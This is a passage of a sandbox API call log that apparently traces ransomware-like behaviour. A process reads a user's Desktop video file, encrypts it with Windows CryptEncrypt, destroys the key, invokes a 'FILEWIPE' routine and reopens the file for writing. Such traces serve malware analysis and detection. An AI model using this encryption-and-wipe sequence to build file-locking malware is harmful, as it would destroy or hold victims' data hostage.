nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x51e7, lpOverlapped=0x0) returned 1 [0032.393] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x151e7) returned 0x955018 [0032.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.397] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.398] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.398] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.398] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.398] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.398] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.399] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.399] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.400] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x151e7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x151f0) returned 1 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.401] CharLowerBuffW (in: lpsz="byte[86513]", cchLength=0xb | out: lpsz="byte[86513]") returned 0xb [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.403] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ba390*, pdwDataLen=0x6ae220*=0x151e7, dwBufLen=0x151f0 | out: pbData=0x8ba390*, pdwDataLen=0x6ae220*=0x151f0) returned 1 [0032.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.403] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.403] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.403] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.414] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.414] CryptDestroyKey (hKey=0x7c2280) returned 1 [0032.414] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.415] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.415] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0032.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.415] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.415] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x9efc70e0, ftLastWriteTime.dwHighDateTime=0x1d5c21a, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZUXz.avi", cAlternateFileName="")) returned 0x7c2100 [0032.416] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.416] CharLowerBuffW (in: lpsz="byte[86503]", cchLength=0xb | out: lpsz="byte[86503]") returned 0xb [0032.417] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.417] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.417] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.417] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.418] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.418] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.418] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zuxz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0032.418] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.419] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.419] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.420] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 